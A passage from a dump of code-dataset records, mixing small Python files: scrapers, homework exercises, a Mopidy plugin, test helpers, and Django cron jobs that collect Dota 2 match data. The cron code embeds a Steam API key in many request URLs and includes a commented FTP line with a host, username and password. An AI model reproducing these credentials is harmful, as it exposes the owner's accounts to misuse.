getmaincontent(urllist[i]).encode(\"utf-8\")}\n\t\tmysql.insert_data_to_pages(my_dict=datadict)\n\n\ndef getmaincontenthtml(url):\n\t\"\"\"\n\t:param url:\n\t:return:\n\t\"\"\"\n\tpage = requests.get(url).text\n\thtml = etree.HTML(page)\n\tresult = html.xpath(\"//div[@id='content_views']\")\n\tans = \"\"\n\tfor i in result:\n\t\ttmp = etree.tostring(i, encoding=\"utf-8\")\n\t\ttmp = tmp.decode(\"utf-8\").replace(\"<\", \"<\").replace(\">\", \">\")\n\t\ttmp = utils.dealstring(tmp)\n\t\tans += tmp\n\treturn ans\n\n\ndef getmaincontent(url):\n\t\"\"\"\n\t:param url:\n\t:return:\n\t\"\"\"\n\tpage = requests.get(url).text\n\thtml = etree.HTML(page)\n\tresult = html.xpath(\"//div[@id='content_views']\")\n\tif result is None or len(result) <= 0:\n\t\treturn \"\"\n\ttmp = result[0].xpath(\"string(.)\")\n\ttmp = utils.dealstring(tmp)\n\treturn tmp\n","sub_path":"spiders/csdn_spider.py","file_name":"csdn_spider.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"636884911","text":"#!/usr/bin//env python3\n\n# Created by: Jack D'Angelo\n# Created on: January 2020\n# This is program compares 2 numbers with up to 3 decimal places\n\n\ndef main():\n    # This functions compares 2 numbers\n    print(\"The program compares two numbers\")\n    print(\"\")\n\n    # Input\n    num_1 = input(\"Number 1: \")\n    num_2 = input(\"Number 2: \")\n    # Process\n\n    try:\n        float_1 = float(num_1)\n        float_2 = float(num_2)\n\n        float_1b = round(float_1, 3)\n        float_2b = round(float_2, 3)\n        # Compares the numbers that were rounded\n\n        if float_1b == float_2b:\n            print(\"These numbers are the same up to three decimal places.\")\n        elif float_1b > float_2b:\n            print(\"{} is the larger of the two numbers\".format(float_1))\n        elif float_1b < float_2b:\n            print(\"{} is the larger of the two numbers\".format(float_2))\n        else:\n            print(\"Please enter a valid number\")\n\n    except Exception:\n        print(\"Error\")\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"decimal.py","file_name":"decimal.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"240078917","text":"# future imports\nfrom __future__ import unicode_literals\n\n# stdlib imports\nimport logging\nimport time\nimport threading\n\n# third-party imports\nimport pykka\nfrom mopidy.core import CoreListener\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass WebhookPlayback(pykka.ThreadingActor, CoreListener):\n    \"\"\"Control the tracklist and playback functionality of mopidy.\n    Fetches the head track, adds to tracklist, and starts playback.\n    If a timelapse is set, then the track is seeked to the given position.\n\n    Note that it also sends status reports every 2 seconds while\n    a track is playing to update the server information to sync the track.\n    \"\"\"\n\n    def __init__(self, config, core, session):\n        super(WebhookPlayback, self).__init__()\n        self.config = config\n        self.core = core\n        self.session = session\n        self.timer = None\n\n    def on_start(self):\n        # Wait a couple of seconds, to let mopidy settle\n        time.sleep(4)\n        logger.info('{0} actor started.'.format(self.__class__.__name__))\n        # Set track to play a track once, then remove from tracklist\n        self.core.tracklist.consume = True\n        self._start_head_track()\n\n    def on_stop(self):\n        logger.info('{0} actor stopped.'.format(self.__class__.__name__))\n        # Empty queue\n        self.core.tracklist.clear()\n        self.timer.cancel()\n\n    def on_event(self, event, **kwargs):\n        if event == 'track_playback_started':\n            self.update_status()\n        elif event == 'track_playback_ended':\n            self.timer.cancel()\n            self._next_head_track()\n\n    def update_status(self):\n        time.sleep(1)\n        try:\n            if self.core.playback.current_track.get():\n                kwargs = {\n                    'state': self.core.playback.state.get(),\n                    'time_position': self.core.playback.time_position.get(),\n                }\n                self.session.update_head(kwargs)\n        except:\n            pass\n\n        self.timer = threading.Timer(1, self.update_status)\n        self.timer.start()\n\n    def _next_head_track(self):\n        # Start new head track\n        self.session.pop_head()\n        # Allow some time for the api server to update\n        time.sleep(0.5)\n        self._start_head_track()\n\n    def _seek_track(self, track):\n        seek_time = track['time_position'] + 1500\n        if seek_time >= track['track']['duration_ms']:\n            self._next_head_track()\n        else:\n            time.sleep(1.5)\n            self.core.playback.seek(track['time_position'])\n\n    def _start_head_track(self):\n        # then fetch the head track\n        self.core.tracklist.clear()\n        track = self.session.fetch_head()\n        # Add track to queue\n        self.core.tracklist.add(uri=track['track']['uri'])\n        # Set track to active\n        self.core.playback.play()\n\n        if track['time_position']:\n            self.core.playback.pause()\n            self._seek_track(track)\n","sub_path":"mopidy_webhook/playback.py","file_name":"playback.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"35067174","text":"import os\nimport sys\nimport unittest\nimport github3\nfrom expecter import expect, add_expectation\n\n\nclass BaseTest(unittest.TestCase):\n    api = 'https://api.github.com/'\n    kr = 'kennethreitz'\n    sigm = 'sigmavirus24'\n    todo = 'Todo.txt-python'\n    gh3py = 'github3py'\n    test_repo = 'github3.py_test'\n\n    def __init__(self, methodName='runTest'):\n        super(BaseTest, self).__init__(methodName)\n        self.auth = False\n        user = self.user = os.environ.get('__USER')\n        pw = self.pw = os.environ.get('__PASS')\n        if user and pw:\n            self._g = github3.login(user, pw)\n        self.__reinit_github__()\n\n    def __reinit_github__(self):\n        self.g = github3.GitHub()\n        if self.auth:\n            self._g = github3.login(self.user, self.pw)\n\n    def setUp(self):\n        super(BaseTest, self).setUp()\n        self.__reinit_github__()\n\n    def assertIsNotNone(self, value, msg=None):\n        if sys.version_info >= (2, 7):\n            super(BaseTest, self).assertIsNotNone(value, msg)\n        else:\n            try:\n                assert value is not None\n            except AssertionError:\n                self.fail(msg)\n\n    def assertAreNotNone(self, obj, *attrs):\n        \"\"\"Assert the attributes of the object are not none\"\"\"\n        for attr in attrs:\n            self.assertIsNotNone(getattr(obj, attr),\n                '{0} is None'.format(attr))\n\n    def expect_list_of_class(self, l, cls):\n        for i in l:\n            expect(i).isinstance(cls)\n\n\ndef is_not_None(var):\n    return var is not None\n\n\ndef is_None(var):\n    return var is None\n\n\ndef is_True(var):\n    return var is True\n\n\ndef is_False(var):\n    return var is False\n\nadd_expectation(is_not_None)\nadd_expectation(is_None)\nadd_expectation(is_True)\nadd_expectation(is_False)\n\nif sys.version_info >= (3, 0):\n    str_test = (str, bytes)\nelse:\n    str_test = (str, unicode)\n","sub_path":"tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"13762542","text":"# Задача №1\n\nbudget = int(input('Введите ваш бюджет на поездку в отпуск, руб.: '))\nvacation_duration = int(input('Продолжительность вашего отпуска, дн.: '))\ndaily_expenses = int(input('Предполагаемы�� ежедневные расходы, руб.: '))\nnumber_of_countries = int(input('Количество посещаемых стран: '))\n\ncosts_of_flying = 50 * 2\nexchange_rate = 70\n\ncost_of_vacation_rur = vacation_duration * round(daily_expenses) + costs_of_flying * number_of_countries * exchange_rate\ncost_of_vacation_eur = cost_of_vacation_rur // exchange_rate\n\nprint('Стоимость вашего путешествия: {} руб. ({} евро)'.format(cost_of_vacation_rur, cost_of_vacation_eur))\n\nif budget < cost_of_vacation_rur:\n    deficit_rur = cost_of_vacation_rur - budget\n    deficit_eur = deficit_rur // exchange_rate\n    print('Вам не хватает {} руб. ({} евро)'.format(deficit_rur, deficit_eur))\n\n# Задача №2\n\n\nfrom time import sleep\n\ndolly = ('овца', 'овцы', 'овец')\ncount = 0\nend = int(input('До скольки будем считать перед сном: '))\nwhile True:\n    count += 1\n    if count == end + 1:\n        break\n    elif count % 10 == 1 and count != 11:\n        n = 0\n    elif count % 10 in [2, 3, 4] and count not in [12, 13, 14]:\n        n = 1\n    else:\n        n = 2\n    print('{} {}'.format(count, dolly[n]))\n    sleep(1)\n","sub_path":"1.1.python.console.conditional/hw1-1.py","file_name":"hw1-1.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"366520185","text":"\ndef func():\n    x = 4\n    action = (lambda n: x ** n) # Запоминается х из объемлющей фугкции def\n    return action\n\nx = func()\nprint(x(2))\n\n#Аналог только будет работать во всех версиях Python\ndef func1():\n    x = 4\n    action =(lambda n, x=x: x ** n) # передача х вручную\n    return action\n\nact = func1()\nprint(act(2))\n\"\"\"\nЭто достаточно замысловатый случай, но с ним можно столкнуться на практи-\nке, особенно в программном коде, который генерирует функции-обработчики\nсобытий для элементов управления в графическом интерфейсе (например, об-\nработчики нажатия кнопок).\n\"\"\"\ndef makeaction():\n    acts = []\n    for i in range(5):        # Использовать значение по умалчанию\n        acts.append(lambda x, i=i: i ** x)  # сохранить текущее значение 'i' книга стр.493\n    return acts\n\nacts = makeaction()\nprint(acts[2](2))","sub_path":"chapter17/lambda_expression.py","file_name":"lambda_expression.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"325753462","text":"import requests\n\n# Search GitHub's repositories\n\nresponse = requests.get(\n    'https://api.github.com/search/repositories',\n    params={'q': 'requests+language:python'},\n    headers={'Accept': 'application/vnd.github.v3.text-match+json'}\n)\n\n# Inspect some attributes of the repository\njson_response = response.json()\nrepository = json_response['items'][0]\nprint(f'Text matches: {repository[\"text_matches\"]}')\n","sub_path":"WebScraping/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"299913610","text":"import os\r\nimport traceback\r\n\r\nfrom django_cron import CronJobBase, Schedule\r\nimport datetime\r\nfrom django.utils import timezone\r\nimport requests\r\nimport urllib.request\r\nfrom bs4 import BeautifulSoup\r\nimport ssl\r\nimport json\r\nfrom json.decoder import JSONDecodeError\r\n\r\nfrom ollo_mainapp import models\r\nfrom ollo_mainapp.models import Team, Match, PreMatch, Player\r\n\r\n\r\n# class UpdateTeams(CronJobBase):\r\n#     RUN_EVERY_MINS = 10000\r\n#\r\n#     schedule = Schedule(run_every_mins=RUN_EVERY_MINS)\r\n#     code = 'ollo_mainapp.cron.update_teams'\r\n#\r\n#     def do(self):\r\n#         resp = requests.get('https://api.opendota.com/api/teams')\r\n#         output = json.loads(resp.text)\r\n#         json.dump(output, os.path.abspath('./data/teams.json'))\r\n\r\n\r\nclass CreateTeams(CronJobBase):\r\n    RUN_EVERY_MINS = 0.1\r\n\r\n    schedule = Schedule(run_every_mins=RUN_EVERY_MINS)\r\n    code = 'ollo_mainapp.cron.create_teams'\r\n\r\n    def do(self):\r\n        try:\r\n            with open(os.path.abspath('./ollo_mainapp/data/teams.json'), 'rb') as json_file:\r\n                for team in json.load(json_file):\r\n                    try:\r\n                        Team.objects.get(team_name=team['name'])\r\n                    except:\r\n                        if team['name']:\r\n                            team_name = team['name'].lstrip().rstrip()\r\n                            if team['logo_url']:\r\n                                img_data = requests.get(team['logo_url']).content\r\n                                file_path = os.path.abspath(\r\n                                        './ollo_mainapp/static/ollo_mainapp/images/logos/dota/{}.png'.format(\r\n                                            team_name.replace('/', '').replace(\" \", \"_\")))\r\n                                with open(file_path, 'wb') as handler:\r\n                                    handler.write(img_data)\r\n                                t = Team(team_name=team_name, tag=team['tag'], team_id=team['team_id'],\r\n                                         logo=\"ollo_mainapp/images/logos/dota/{}.png\".format(team_name.replace('/', '').replace(\" \", \"_\")),\r\n                                         wins=team['wins'], losses=team['losses'], elo=team['rating'])\r\n                                t.save()\r\n                            else:\r\n                                t = Team(team_name=team_name, tag=team['tag'], team_id=team['team_id'],\r\n                                         logo=\"ollo_mainapp/images/logos/dota/team-z_2.png\",\r\n                                         wins=team['wins'], losses=team['losses'], elo=team['rating'])\r\n                                t.save()\r\n        except:\r\n            print(traceback.format_exc())\r\n\r\n\r\nclass GetUpcoming(CronJobBase):\r\n    RUN_EVERY_MINS = 0.1\r\n\r\n    schedule = Schedule(run_every_mins=RUN_EVERY_MINS)\r\n    code = 'ollo_mainapp.cron_get_upcoming'    # a unique code\r\n\r\n    def do(self):\r\n        # That's ass but that's what it has to be xD\r\n        months = [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\",\r\n                  \"November\", \"December\"]\r\n\r\n        # FTP connection\r\n        # ftp = FTP(host='31.31.198.67', user='u0786421', passwd='HsaQ!32a')\r\n        # ftp.cwd('/www/ollo.gg/images/logos/dota')\r\n        #\r\n        # toCheck = ftp.nlst()\r\n\r\n        to_check = [f for f in os.listdir('./ollo_mainapp/static/ollo_mainapp/images/logos/dota/')]\r\n\r\n        jsons = []\r\n        gcontext = ssl.SSLContext()\r\n        with urllib.request.urlopen(\"https://liquipedia.net/dota2/Liquipedia:Upcoming_and_ongoing_matches\",\r\n                                    context=gcontext) as url:\r\n            page = url.read()\r\n        soup = BeautifulSoup(page, \"html.parser\")\r\n        # Getting matches\r\n        find_matchbox = soup.findAll('div', attrs={'id': 'infobox_matches'})\r\n        upcoming = str(find_matchbox[0]) if len(find_matchbox) < 2 else str(find_matchbox[1])\r\n\r\n        newSoup = BeautifulSoup(upcoming, \"html.parser\")\r\n        upcomingMatches = newSoup.findAll('table', attrs={'class': 'infobox_matches_content'})\r\n        # Getting upcoming matches, downloading logos\r\n        for match in upcomingMatches:\r\n            date = str(\r\n                match.find('span', attrs={'class': 'timer-object'}).text).split(\",\")\r\n            yearTime = date[1].strip().split(\" - \")\r\n            month = date[0].split()[0]\r\n            day = date[0]\r\n            year = yearTime[0]\r\n            hour = yearTime[1].split()[0]\r\n            best_of = match.find('td', attrs={'class': 'versus'}).find('abbr').text\r\n            if datetime.datetime.utcnow().day + 1 < int(day.split()[1]) or month != months[\r\n                datetime.datetime.utcnow().month - 1]:\r\n                break\r\n            league = match.find('td', attrs={'class': 'match-filler'}).find('div').text\r\n            leftTeamSpan = match.find('td', attrs={'class': 'team-left'}).find('span', attrs={\r\n                'class': 'team-template-image'})\r\n            if leftTeamSpan.find('a') is None:\r\n                continue\r\n            else:\r\n                leftTeamName = leftTeamSpan.find('a').get(\"title\")\r\n                leftTeamLogo = \"https://liquipedia.net\" + leftTeamSpan.find('img').get('src')\r\n                if \"Dotalogo\" in leftTeamLogo:\r\n                    pathToLeftPic = \"team-z_2.png\"\r\n                else:\r\n                    pathToLeftPic = '{}.png'.format(str(leftTeamName).replace(\" \", \"_\"))\r\n                    if pathToLeftPic not in to_check:\r\n                        img_data = requests.get(leftTeamLogo).content\r\n                        with open(os.path.abspath('./ollo_mainapp/static/ollo_mainapp/images/logos/dota/{}'.format(pathToLeftPic)), 'wb') as handler:\r\n                            handler.write(img_data)\r\n            rightTeamSpan = match.find('td', attrs={'class': 'team-right'}).find('span', attrs={\r\n                'class': 'team-template-image'})\r\n            if rightTeamSpan.find('a') is None:\r\n                continue\r\n            else:\r\n                rightTeamName = rightTeamSpan.find('a').get(\"title\")\r\n                rightTeamLogo = \"https://liquipedia.net\" + rightTeamSpan.find('img').get('src')\r\n                # print(\"{0:s}\".format(rightTeamLogo))\r\n                if \"Dotalogo\" in rightTeamLogo:\r\n                    pathToRightPic = \"team-z_2.png\"\r\n                else:\r\n                    pathToRightPic = '{}.png'.format(str(rightTeamName).replace(\" \", \"_\"))\r\n                    if pathToRightPic not in to_check:\r\n                        img_data = requests.get(rightTeamLogo).content\r\n                        with open(os.path.abspath('./ollo_mainapp/static/ollo_mainapp/images/logos/dota/{}'.format(pathToRightPic)), 'wb') as handler:\r\n                            handler.write(img_data)\r\n            if len(str(months.index(day.split()[0]) + 1)) == 1:\r\n                month_num = '0{}'.format(months.index(day.split()[0]) + 1)\r\n            else:\r\n                month_num = months.index(day.split()[0]) + 1\r\n            try:\r\n                time_string = '{}/{}/{} {}:00'.format(month_num, day.split()[1], str(year)[:2], hour)\r\n                if not list(Team.objects.filter(team_name=leftTeamName)):\r\n                    t1 = Team(team_name=leftTeamName, logo=\"ollo_mainapp/images/logos/dota/{}\".format(pathToLeftPic))\r\n                    t1.save()\r\n                else:\r\n                    t1 = Team.objects.get(team_name=leftTeamName)\r\n                if not list(Team.objects.filter(team_name=rightTeamName)):\r\n                    t2 = Team(team_name=rightTeamName, logo=\"ollo_mainapp/images/logos/dota/{}\".format(pathToRightPic))\r\n                    t2.save()\r\n                else:\r\n                    t2 = Team.objects.get(team_name=rightTeamName)\r\n                start_time = datetime.datetime.strptime(time_string, '%m/%d/%y %H:%M:%S') + datetime.timedelta(hours=3)\r\n                match = PreMatch(start_date=start_time, league=league, best_of=best_of)\r\n                if leftTeamName not in [teamset.all()[0].team_name for teamset in [match.team_set for match in PreMatch.objects.filter(start_date=start_time)]]:\r\n                    if leftTeamName not in [qset[0]['team_name'] for qset in [match.team_set.all().values('team_name') for match in PreMatch.objects.filter(team__team_name=rightTeamName)]]:\r\n                        match.save()\r\n                        t1.pre_match.add(match)\r\n                        t2.pre_match.add(match)\r\n                    else:\r\n                        for pre_m in PreMatch.objects.filter(team__team_name=leftTeamName):\r\n                            team_set = pre_m.team_set.all()\r\n                            if team_set.all()[0].team_name == leftTeamName and team_set.all()[1] == rightTeamName:\r\n                                setattr(pre_m, 'start_date', start_time)\r\n                                break\r\n            except:\r\n                print(traceback.format_exc())\r\n        return json.dumps(jsons)\r\n\r\n\r\nclass CheckIfLiveEnded(CronJobBase):\r\n    RUN_EVERY_MINS = 0.001\r\n    schedule = Schedule(run_every_mins=RUN_EVERY_MINS)\r\n    code = 'ollo_mainapp.cron_if_ended'  # a unique code\r\n\r\n    def do(self):\r\n        for match in list(Match.objects.filter(is_live=True)):\r\n            try:\r\n                with urllib.request.urlopen(\r\n                        \"http://api.steampowered.com/IDOTA2Match_570/GetMatchDetails/v1?key=1B057FBB83237A617FDFC684FDF9F8E1&match_id={}\".format(match.match_id)) as url:\r\n                    page = url.read()\r\n                output = json.loads(page)['result']\r\n                for player in output['players']:\r\n                    items = [player['item_0'], player['item_1'], player['item_2'], player['item_3'], player['item_4'],\r\n                             player['item_5'], player['backpack_0'], player['backpack_1'], player['backpack_2']]\r\n                    player['items'] = items\r\n                try:\r\n                    setattr(match, 'radiant_win', output['radiant_win'])\r\n                except KeyError:\r\n                    print('No winner for match: {}'.format(match.match_id))\r\n                setattr(match, 'game_time', datetime.timedelta(seconds=output['duration']))\r\n                setattr(match, 'team1_barracks', output['barracks_status_radiant'])\r\n                setattr(match, 'team2_barracks', output['barracks_status_dire'])\r\n                setattr(match, 'team1_towers', output['tower_status_radiant'])\r\n                setattr(match, 'team2_towers', output['tower_status_dire'])\r\n                setattr(match, 'team1_score', output['radiant_score'])\r\n                setattr(match, 'team2_score', output['dire_score'])\r\n                setattr(match, 'team1_players', json.dumps(dict(players=output['players'][:5])))\r\n                setattr(match, 'team2_players', json.dumps(dict(players=output['players'][5:])))\r\n                setattr(match, 'is_live', False)\r\n                setattr(match, 'has_ended', True)\r\n                match.save()\r\n            except:\r\n                print(traceback.format_exc())\r\n                continue\r\n\r\n\r\nclass GetLiveMatchesData(CronJobBase):\r\n    RUN_EVERY_MINS = 0.001\r\n    schedule = Schedule(run_every_mins=RUN_EVERY_MINS)\r\n    code = 'ollo_mainapp.cron_get_lives'  # a unique code\r\n\r\n    def create_team(self, match, side):\r\n        to_check = [f for f in os.listdir('./ollo_mainapp/static/ollo_mainapp/images/logos/dota/')]\r\n        try:\r\n            resp = requests.get('https://api.opendota.com/api/teams/{}'.format(match['team_id_{}'.format(side)]))\r\n            output = json.loads(resp.text)\r\n            team_name = output['name']\r\n            logo_link = output['logo_url']\r\n\r\n            file_name = '{}.png'.format(team_name.replace(\" \", \"_\"))\r\n\r\n            if logo_link == '':\r\n                final_path = 'ollo_mainapp/images/logos/dota/team-z_2.png'\r\n            else:\r\n                final_path = 'ollo_mainapp/images/logos/dota/{}'.format(file_name)\r\n                if file_name not in to_check:\r\n                    img_data = requests.get(logo_link).content\r\n                    with open(os.path.abspath('ollo_mainapp/static/{}'.format(final_path)), 'wb') as handler:\r\n                        handler.write(img_data)\r\n            try:\r\n                temp_t = Team.objects.get(team_name=team_name)\r\n                setattr(temp_t, 'elo', output['rating'])\r\n                setattr(temp_t, 'wins', output['wins'])\r\n                setattr(temp_t, 'losses', output['losses'])\r\n                temp_t.save()\r\n                return temp_t\r\n            except models.Team.DoesNotExist:\r\n                team = Team(team_name=team_name, logo=final_path, elo=output['rating'], wins=output['wins'],\r\n                        losses=output['losses'])\r\n                return team\r\n\r\n        except JSONDecodeError:\r\n            resp = requests.get(\r\n                'http://api.steampowered.com/IDOTA2Match_570/GetTeamInfoByTeamID/v1?key=1B057FBB83237A617FDFC684FDF9F8E1&start_at_team_id={}&teams_requested=1'.format(\r\n                    match['team_id_{}'.format(side)]))\r\n            output = json.loads(resp.text)['result']['teams'][0]\r\n            resp = requests.get('http://api.steampowered.com/ISteamRemoteStorage/GetUGCFileDetails/v1/?key=1B057FBB83237A617FDFC684FDF9F8E1&appid=570&ugcid={}'.format(\r\n                output['logo']))\r\n\r\n            team_name = output['name']\r\n            try:\r\n                logo_link = json.loads(resp.text)['data']['url']\r\n\r\n                file_name = '{}.png'.format(team_name.replace(\" \", \"_\"))\r\n\r\n                final_path = 'ollo_mainapp/images/logos/dota/{}'.format(file_name)\r\n                if file_name not in to_check:\r\n                    img_data = requests.get(logo_link).content\r\n                    with open(os.path.abspath('ollo_mainapp/static/{}'.format(final_path)), 'wb') as handler:\r\n                        handler.write(img_data)\r\n            except KeyError:\r\n                final_path = 'ollo_mainapp/images/logos/dota/team-z_2.png'\r\n            try:\r\n                return Team.objects.get(team_name=team_name)\r\n            except models.Team.DoesNotExist:\r\n                team = Team(team_name=team_name, logo=final_path)\r\n                return team\r\n\r\n    def do(self):\r\n        try:\r\n            lives = {}\r\n            try:\r\n                with urllib.request.urlopen(\r\n                        \"http://api.steampowered.com/IDOTA2Match_570/GetTopLiveGame/v0001/?key=1B057FBB83237A617FDFC684FDF9F8E1&partner=2\") as url:\r\n                    page = url.read()\r\n                output = json.loads(page)['game_list']\r\n\r\n                for match in output:\r\n                    try:\r\n                        match_id = match['match_id']\r\n                        if match_id not in lives.keys() and match['team_id_radiant'] and match['team_id_dire']:\r\n                            lives.setdefault(match_id, [match, 2])\r\n                    except KeyError:\r\n                        continue\r\n            except:\r\n                pass\r\n            # try:\r\n            #     with urllib.request.urlopen(\r\n            #             'http://api.steampowered.com/IDOTA2Match_570/GetTopLiveGame/v0001/?key=1B057FBB83237A617FDFC684FDF9F8E1&partner=3') as url:\r\n            #         page = url.read()\r\n            #     output = json.loads(page)['game_list']\r\n            #\r\n            #     for match in output:\r\n            #         try:\r\n            #             match_id = match['match_id']\r\n            #             if match_id not in lives.keys() and match['team_id_radiant'] and match['team_id_dire']:\r\n            #                 lives.setdefault(match_id, [match, 3])\r\n            #         except KeyError:\r\n            #             continue\r\n            # except:\r\n            #     pass\r\n\r\n            for match_id, temp in lives.items():\r\n                match = temp[0]\r\n                if match_id not in list(Match.objects.all().values_list('match_id', flat=True)) and len(\r\n                        match['players']) == 10:\r\n                    local_league = ''\r\n                    with open(os.path.abspath('./ollo_mainapp/data/leagues.json'), 'rb') as json_file:\r\n                        leagues = json.load(json_file)['leagues']\r\n                    for league in leagues:\r\n                        if match['league_id'] == league['id']:\r\n                            local_league = league['name']\r\n                            break\r\n                    if local_league != '':\r\n                        m = Match(match_id=match_id,\r\n                                  partner=temp[1],\r\n                                  server_id=match['server_steam_id'],\r\n                                  start_date=datetime.datetime.utcfromtimestamp(match['activate_time']).replace(tzinfo=timezone.get_current_timezone()),\r\n                                  league=local_league,\r\n                                  game_time=datetime.timedelta(seconds=match['game_time']),\r\n                                  team1_score=match['radiant_score'],\r\n                                  team2_score=match['dire_score'],\r\n                                  radiant_lead=match['radiant_lead'],\r\n                                  building_state=match['building_state'],\r\n                                  is_live=True,\r\n                                  realtime_delay=datetime.timedelta(seconds=match['delay']))\r\n\r\n                        m.save()\r\n\r\n                        t1 = self.create_team(match, 'radiant')\r\n                        t2 = self.create_team(match, 'dire')\r\n\r\n                        gcontext = ssl.SSLContext()\r\n                        with urllib.request.urlopen(\"https://liquipedia.net/dota2/Liquipedia:Upcoming_and_ongoing_matches\",\r\n                                                    context=gcontext) as url:\r\n                            page = url.read()\r\n\r\n                        soup = BeautifulSoup(page, \"html.parser\")\r\n                        live_box = soup.find_all('div', attrs={'id': 'infobox_matches'})[0]\r\n                        tables = live_box.find_all('table')\r\n                        for table in tables:\r\n                            for tag in table.find_all('a'):\r\n                                title = tag.get('title')\r\n                                if t1.team_name in title or t2.team_name in title:\r\n                                    best_of = table.find('td', attrs={'class': 'versus'}).find('abbr').text\r\n                                    setattr(m, 'best_of', best_of.upper())\r\n                                    m.save()\r\n                                    break\r\n\r\n                        t1.save()\r\n                        t2.save()\r\n                        t1.match.add(m)\r\n                        t2.match.add(m)\r\n        except:\r\n            print(traceback.format_exc())\r\n\r\n\r\nclass GetLiveStatsForMatches(CronJobBase):\r\n    RUN_EVERY_MINS = 0.001\r\n    schedule = Schedule(run_every_mins=RUN_EVERY_MINS)\r\n    code = 'ollo_mainapp.cron_live_data_parse'  # a unique code\r\n\r\n    def create_players(self, team, player_list):\r\n        for player in player_list:\r\n            try:\r\n                p = Player.objects.get(player_id=player['accountid'])\r\n            except models.Player.DoesNotExist:\r\n                p = Player(player_team=team, player_id=player['accountid'])\r\n            output = json.loads(\r\n                requests.get('https://api.opendota.com/api/players/{}'.format(player['accountid'])).text)\r\n            if output['profile']['name']:\r\n                setattr(p, 'nickname', output['profile']['name'])\r\n            else:\r\n                setattr(p, 'nickname', output['profile']['personaname'])\r\n            setattr(p, 'avatar', output['profile']['avatar'])\r\n            setattr(p, 'mmr', output['mmr_estimate']['estimate'])\r\n            setattr(p, 'nw', player['net_worth'])\r\n            setattr(p, 'item_list', json.dumps(dict(item_list=player['items'])))\r\n            setattr(p, 'hero_id', player['heroid'])\r\n            setattr(p, 'kills', player['kill_count'])\r\n            setattr(p, 'deaths', player['death_count'])\r\n            p.save()\r\n\r\n        return None\r\n\r\n    def do(self):\r\n        for match in list(Match.objects.all().filter(is_live=True)):\r\n            try:\r\n                with urllib.request.urlopen(\r\n                        \"http://api.steampowered.com/IDOTA2Match_570/GetTopLiveGame/v0001/?key=1B057FBB83237A617FDFC684FDF9F8E1&partner={}\".format(match.partner)) as url:\r\n                    page = url.read()\r\n                output = json.loads(page)['game_list']\r\n                for game in output:\r\n                    if game['match_id'] == match.match_id:\r\n                        try:\r\n                            if game['radiant_lead'] == 0:\r\n                                bs = 2392137\r\n                                game_time = datetime.timedelta(seconds=0)\r\n                            else:\r\n                                bs = game['building_state']\r\n                                game_time = datetime.timedelta(seconds=game['game_time'])\r\n                            setattr(match, 'radiant_lead', game['radiant_lead'])\r\n                            setattr(match, 'game_time', game_time)\r\n                            setattr(match, 'building_state', bs)\r\n                            setattr(match, 'team1_score', game['radiant_score'])\r\n                            setattr(match, 'team2_score', game['dire_score'])\r\n                            match.save()\r\n                        except KeyError:\r\n                            continue\r\n\r\n                with urllib.request.urlopen(\r\n                        \"http://api.steampowered.com/IDOTA2MatchStats_570/GetRealTimeStats/v1?key=1B057FBB83237A617FDFC684FDF9F8E1&server_steam_id={}\".format(match.server_id)) as url:\r\n                    page = url.read()\r\n                try:\r\n                    match_data = json.loads(page)['match']\r\n                    teams_data = json.loads(page)['teams']\r\n\r\n                    try:\r\n                        bans = match_data['bans']\r\n                        team1_bans = []\r\n                        team2_bans = []\r\n                        for ban in bans:\r\n                            if ban['team'] == 2:\r\n                                team1_bans.append(ban['hero'])\r\n                            elif ban['team'] == 3:\r\n                                team2_bans.append(ban['hero'])\r\n\r\n                        setattr(match, 'team1_bans', json.dumps(dict(bans=team1_bans)))\r\n                        setattr(match, 'team2_bans', json.dumps(dict(bans=team2_bans)))\r\n                    except KeyError:\r\n                        print(\"Not Captain's Mode\")\r\n\r\n                    buildings = json.loads(page)['buildings']\r\n                    team1_barracks = ''\r\n                    team2_barracks = ''\r\n\r\n                    for building in buildings:\r\n                        if building['type'] == 1:\r\n                            if building['team'] == 2:\r\n                                if building['destroyed']:\r\n                                    team1_barracks += '0'\r\n                                else:\r\n                                    team1_barracks += '1'\r\n                            elif building['team'] == 3:\r\n                                if building['destroyed']:\r\n                                    team2_barracks += '0'\r\n                                else:\r\n                                    team2_barracks += '1'\r\n\r\n                    self.create_players(Team.objects.get(team_name=match.get_first_team_name()),\r\n                                        teams_data[0]['players'])\r\n                    self.create_players(Team.objects.get(team_name=match.get_second_team_name()),\r\n                                        teams_data[1]['players'])\r\n\r\n                    setattr(match, 'team1_players', json.dumps(dict(players=teams_data[0]['players'])))\r\n                    setattr(match, 'team2_players', json.dumps(dict(players=teams_data[1]['players'])))\r\n\r\n                    setattr(match, 'team1_barracks', int(team1_barracks, 2))\r\n                    setattr(match, 'team2_barracks', int(team2_barracks, 2))\r\n\r\n                    match.save()\r\n                except KeyError:\r\n                    print(traceback.format_exc())\r\n                    print(\"Didn't get data for {}\".format(match))\r\n                except:\r\n                    traceback.format_exc()\r\n            except:\r\n                print(traceback.format_exc())\r\n                print(\"Didn't get barracks data for {}. Server id: {}. Match id: {}.\".format(match, match.server_id, match.match_id))\r\n                continue\r\n\r\n\r\nclass ClearPreMatches(CronJobBase):\r\n    RUN_EVERY_MINS = 0.001\r\n    schedule = Schedule(run_every_mins=RUN_EVERY_MINS)\r\n    code = 'ollo_mainapp.clear_pres'  # a unique code\r\n\r\n    def do(self):\r\n        